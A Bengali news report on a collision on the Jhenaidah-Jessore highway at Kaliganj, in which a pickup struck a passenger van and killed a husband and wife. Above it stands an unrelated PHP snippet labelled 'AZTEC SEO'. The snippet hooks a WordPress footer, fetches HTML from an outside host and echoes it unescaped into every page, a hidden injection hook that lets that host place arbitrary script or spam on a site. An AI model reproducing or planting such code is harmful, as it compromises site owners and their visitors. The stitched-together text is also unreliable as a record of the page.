/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ঝিনাইদহ-যশোর মহাসড়কে কালীগঞ্জে শ্যালো ইঞ্জিনচালিত ভ্যানের সঙ্গে মাছবোঝাই পিকআপ ভ্যানের সংঘর্ষে স্বামী ও স্ত্রী নিহত হয়েছেন। এ দুর্ঘটনায় শিশুসহ ভ্যানের তিন যাত্রী আহত হয়েছেন।
আজ মঙ্গলবার সকাল ৬টার দিকে এ ঘটনা ঘটে। নিহতরা হলেন ঝিনাইদহ সদর উপজেলার বিষয়খালী গ্রামের ছাবদার আলী (৫০) ও তার স্ত্রী পারভীনা বেগম (৪৫)।
কালীগঞ্জ থানার উপপরিদর্শক ইকবাল কবির জানান, সকালে ফজরের নামাজ আদায় করে ভ্যানযোগে মেয়ে ও নাতিকে নিয়ে যশোরে ডাক্তার দেখানোর উদ্দেশ্যে ছাবদার আলী তার স্ত্রীকে নিয়ে রওনা দেন। পথে কালীগঞ্জের মোবারকগঞ্জ চিনিকলের সামনে পৌঁছালে পেছনের দিক থেকে আসা মাছবোঝাই পিকআপ ভ্যান যাত্রীবাহী ওই ভ্যানকে ধাক্কা দেয়। এতে ঘটনাস্থলেই নিহত হন পারভীনা। সে সময় গুরুতর আহত অবস্থায় তার স্বামী ছাবদার আলী, মেয়ে সাথী খাতুন, নাতি, ছেলে ও ভ্যানচালক করিমকে উপজেলা স্বাস্থ্য কমপ্লেক্সে ভর্তি করা হয়। পরে শারীরিক অবস্থার অবনতি হলে ছাবদার আলীকে যশোর জেনারেল হাসপাতালে নেওয়ার পথে তার মৃত্যু হয়।